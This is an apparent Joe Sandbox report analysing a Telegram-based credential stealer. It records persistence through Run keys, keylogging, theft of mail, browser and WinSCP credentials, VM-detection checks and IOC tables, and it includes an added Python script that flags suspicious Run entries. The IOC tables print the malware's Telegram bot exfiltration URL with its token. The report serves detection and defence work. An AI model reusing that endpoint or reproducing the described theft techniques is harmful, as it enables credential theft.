Source: Yara match, File source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
Source: Yara match, File source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match, File source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match, File source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
Source: Yara match, File source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
MITRE ATT&CK matrix (numbers in parentheses are the badges shown on the highlighted cells of the matrix; cells without a badge were not observed):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (211) | Registry Run Keys / Startup Folder (11) | Process Injection (112) | Disable or Modify Tools (1) | OS Credential Dumping (1) | Account Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Web Service (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder (11) | Deobfuscate/Decode Files or Information (1) | Input Capture (111) | File and Directory Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Credentials in Registry (1) | System Information Discovery (114) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Encrypted Channel (11) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading (1) | NTDS | Security Software Discovery (211) | Distributed Component Object Model | Input Capture (111) | Scheduled Transfer | Non-Application Layer Protocol (3) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (131) | LSA Secrets | Process Discovery (2) | SSH | Clipboard Data (1) | Data Transfer Size Limits | Application Layer Protocol (14) | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection (112) | Cached Domain Credentials | Virtualization/Sandbox Evasion (131) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph (ID: 830847, Sample: PSFBGrvmxy.exe, Start date: 20/03/2023, Architecture: WINDOWS, Score: 100)

Start node
• DNS/IP: api4.ipify.org; api.telegram.org; api.ipify.org
• Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Yara detected Telegram RAT; 5 other signatures
• Started: PSFBGrvmxy.exe (node 8); Vlrvln.exe (node 12); kDPmkTm.exe (node 14); 2 other processes (node 16)

PSFBGrvmxy.exe (node 8)
• Dropped: C:\Users\user\AppData\Roaming\...\Vlrvln.exe, PE32; C:\Users\user\...\Vlrvln.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\...\PSFBGrvmxy.exe.log, ASCII
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Creates multiple autostart registry keys
• Started: PSFBGrvmxy.exe (node 18); powershell.exe (node 23)

Vlrvln.exe (node 12)
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Encrypted powershell cmdline option found
• Started: Vlrvln.exe (node 25); powershell.exe (node 27); Vlrvln.exe (node 29)

kDPmkTm.exe (node 14)
• Signatures: Injects a PE file into a foreign processes
• Started: powershell.exe (node 31); kDPmkTm.exe (node 33)

2 other processes (node 16)
• Started: powershell.exe (node 35)

PSFBGrvmxy.exe (node 18)
• DNS/IP: api4.ipify.org 64.185.227.155, 443, 49696 WEBNXUS United States; api.telegram.org 149.154.167.220, 443, 49697, 49700 TELEGRAMRU United Kingdom; api.ipify.org
• Dropped: C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32; C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys

Vlrvln.exe (node 25)
• DNS/IP: 173.231.16.76, 443, 49698 WEBNXUS United States; api.ipify.org
• Signatures: Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook

powershell.exe (node 23) started conhost.exe (node 37); powershell.exe (node 27) started conhost.exe (node 39); powershell.exe (node 31) started conhost.exe (node 41); powershell.exe (node 35) started conhost.exe (node 43)

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
PSFBGrvmxy.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX
PSFBGrvmxy.exe | 57% | Virustotal |
PSFBGrvmxy.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX

Source | Detection | Scanner | Label
15.2.Vlrvln.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035

No Antivirus matches

Source | Detection | Scanner | Label
https://api.telegram.org4 | 0% | URL Reputation | safe
https://urn.to/r/sds_see | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 64.185.227.155 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
api.ipify.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org4 | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/jsonschema | kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/json | kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/ | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://urn.to/r/sds_see | PSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
64.185.227.155 | api4.ipify.org | United States | 18450 | WEBNXUS | false
173.231.16.76 | unknown | United States | 18450 | WEBNXUS | false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830847
Start date and time: 2023-03-20 18:30:48 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: PSFBGrvmxy.exe
Original Sample Name: c4b59f8e80a1289b9202a33da41d7d94.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/17@11/3
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 29
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
18:31:57  API Interceptor  157x Sleep call for process: powershell.exe modified
18:32:22  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Vlrvln "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
18:32:27  API Interceptor  732x Sleep call for process: PSFBGrvmxy.exe modified
18:32:30  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:32:40  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Vlrvln "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
18:32:49  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:33:38  API Interceptor  7x Sleep call for process: Vlrvln.exe modified
18:33:53  API Interceptor  111x Sleep call for process: kDPmkTm.exe modified
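The two Run values in the timeline are this sample's persistence: both point into AppData\Roaming, one is unquoted, and both use the value name as (or next to) the executable name. The following is an added triage example, not part of the Joe Sandbox report: a Python script that parses the plain-text output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` collected from a host and flags entries whose image lives in a user-writable directory and that also show the naming pattern seen here. The reg.exe output below is constructed (a benign OneDrive entry next to the report's two values), and the set of user-writable directories and the "location plus one naming signal" threshold are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output (assumption: collected as text from the host). The OneDrive line is a benign
# control entry; the last two mirror the Run values recorded in the report.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Vlrvln    REG_SZ    "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
    kDPmkTm    REG_SZ    C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
"""

# Directories an unprivileged user can write to (assumed list). A Run value pointing
# here is the common stager pattern, but per-user installers also live in AppData.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

# reg.exe separates value name, type and data with four spaces.
VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")


def image_path(data: str) -> str:
    """Extract the executable path from a Run value's data: a quoted path, or an
    unquoted path followed by arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(.*?\.(?:exe|dll|cmd|bat|vbs|js|ps1))", data, re.IGNORECASE)
    return m.group(1) if m else data.split(" ")[0]


def parse_reg_query(text: str):
    """Yield (key, value_name, type, data) tuples from reg.exe text output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3)


def assess(value_name: str, data: str) -> dict:
    """Score one Run value. Location is the necessary condition; the naming
    heuristics only add weight, otherwise OneDrive-style installs (folder and
    value named after the executable) would fire on their own."""
    path = PureWindowsPath(image_path(data))
    low = str(path).lower()
    in_user_dir = any(d in low for d in USER_WRITABLE)
    reasons = []
    if in_user_dir:
        reasons.append("image in user-writable directory")
    if path.parent.name.lower() == path.stem.lower():
        reasons.append("folder named after the executable")
    if value_name.lower() == path.stem.lower():
        reasons.append("value name equals executable stem")
    if not data.strip().startswith('"') and " " in str(path):
        reasons.append("unquoted path containing spaces")
    suspicious = in_user_dir and len(reasons) >= 2
    return {"value": value_name, "image": str(path), "reasons": reasons, "suspicious": suspicious}


def triage(reg_text: str) -> list:
    return [assess(name, data) for _, name, _, data in parse_reg_query(reg_text)]


if __name__ == "__main__":
    for r in triage(SAMPLE_REG_QUERY):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['value']:10} {r['image']}  {'; '.join(r['reasons'])}")
```

The report records the same two writes through the HKCU and HKCU64 views; the parser treats any key line alike, so output from either view can be fed in. Allow-list known per-user software by image path rather than by value name, since the value names here are random and change per build.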
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | widnOAntje.exe | malicious | AgentTesla |
149.154.167.220 | Smh3IA9098.exe | malicious | AgentTesla |
149.154.167.220 | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown |
149.154.167.220 | g0PWOnCNZH.exe | malicious | AgentTesla |
149.154.167.220 | file.exe | malicious | Unknown |
149.154.167.220 | Remittance_slip.bat | malicious | Unknown |
149.154.167.220 | New_Order_M2023SI3.xls | malicious | AgentTesla |
149.154.167.220 | PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer |
149.154.167.220 | PO_340166.exe | malicious | AgentTesla |
149.154.167.220 | PO_IN34023.exe | malicious | AgentTesla, zgRAT |
149.154.167.220 | FixDefError.exe | malicious | Xmrig |
149.154.167.220 | doc10010679052382012143717.exe | malicious | AgentTesla |
149.154.167.220 | EPe7VpI8DZ.exe | malicious | AgentTesla |
149.154.167.220 | NJA7TOaADm.exe | malicious | AgentTesla, zgRAT |
149.154.167.220 | 2wJjtj30x6.exe | malicious | AgentTesla |
149.154.167.220 | iubK8Ka7o7.exe | malicious | AgentTesla |
149.154.167.220 | Bank_Slip-_701536.doc | malicious | AgentTesla |
149.154.167.220 | YWombrpvpG.exe | malicious | AgentTesla |
149.154.167.220 | Bestellung_(PO4703392)_doc.exe | malicious | AgentTesla |
149.154.167.220 | Parts.exe | malicious | AgentTesla |
64.185.227.155 | CnsRlvK7Ho.exe | malicious | Targeted Ransomware | api.ipify.org/
64.185.227.155 | aKiefGOIEn.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
64.185.227.155 | M74aRxVX4H.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
64.185.227.155 | WolcGwXQ5c.exe | malicious | Ficker Stealer, RHADAMANTHYS, Rusty Stealer | api.ipify.org/?format=wef
64.185.227.155 | XZerken3Py.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
64.185.227.155 | xc17rfFdOM.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
64.185.227.155 | 8Ghi4RAfH5.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
64.185.227.155 | fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
64.185.227.155 | file.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
64.185.227.155 | 48PTRR4pVY.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=qwd
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api4.ipify.org | Smh3IA9098.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | CsTapHIkAO.exe | malicious | AgentTesla | 104.237.62.211
api4.ipify.org | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
api4.ipify.org | g0PWOnCNZH.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | FeDex_shipping_document.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 173.231.16.76
api4.ipify.org | New_Order_M2023SI3.xls | malicious | AgentTesla | 104.237.62.211
api4.ipify.org | TT_copy.xls | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | PO_340166.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | 2303-64687.exe | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | Product_specifications.exe | malicious | AgentTesla | 104.237.62.211
api4.ipify.org | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 104.237.62.211
api4.ipify.org | eRPRiQhQEI.exe | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | INV_SOA.exe | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | IMG_6071220733pdf.exe | malicious | AgentTesla | 104.237.62.211
api4.ipify.org | yeni_sipari#U015f.exe | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | yeni_sipari#U015f.exe | malicious | AgentTesla | 173.231.16.76
api4.ipify.org | DHL_AWB_copy_&_draft_COO.exe | malicious | AgentTesla | 64.185.227.155
api4.ipify.org | FixDefError.exe | malicious | Xmrig | 104.237.62.211
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.html | malicious | Unknown | 149.154.167.220
TELEGRAMRU | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | Remittance_slip.bat | malicious | Unknown | 149.154.167.220
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
TELEGRAMRU | setup.exe | malicious | Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar | 149.154.167.99
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | widnOAntje.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Smh3IA9098.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | CsTapHIkAO.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | g0PWOnCNZH.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Payment Invoice file.htm | malicious | HTMLPhisher | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Budget plan 2023.zip | malicious | Unknown | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | setup.exe | malicious | Xmrig | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Remittance_slip.bat | malicious | Unknown | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Payment Invoice 0012657.html | malicious | HTMLPhisher | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | FeDex_shipping_document.exe | malicious | AgentTesla | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 64.185.227.155, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 149.154.167.220, 64.185.227.155, 173.231.16.76
